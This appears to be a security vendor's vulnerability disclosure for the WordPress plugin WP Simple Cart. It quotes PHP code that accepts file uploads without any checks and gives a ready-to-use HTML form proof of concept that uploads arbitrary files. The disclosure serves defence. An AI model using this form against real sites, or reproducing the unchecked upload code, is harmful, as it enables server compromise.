One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/wp-simple-cart/js/json2.js, from the plugin WP Simple Cart. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

When a request to the file /request/simple-cart-upload.php includes a file then that file will be uploaded using the function move_uploaded_file() and will be placed in the directory specified by the variable $uploadfile:

24
25
26
27
28
29
30
31
32
33
34
35
36
37

$user_dir = SimpleCartFunctions::TemporaryDir($_GET['prefix']);
 
if (isset($_GET['file'])) {
    $upload_file = explode('.', $_FILES['userfile']['name']);
    $file_name = $_GET['file'] . '.' . $upload_file[count($upload_file)-1];
}
else {
    $file_name = $_FILES['userfile']['name'];
}
 
//ファイルアップロード
$uploaddir = $user_dir . '/';
$uploadfile = $uploaddir . basename($file_name);
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/wp-simple-cart/files/0/temporary/, if no files have been uploaded through the plugin before.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="userfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>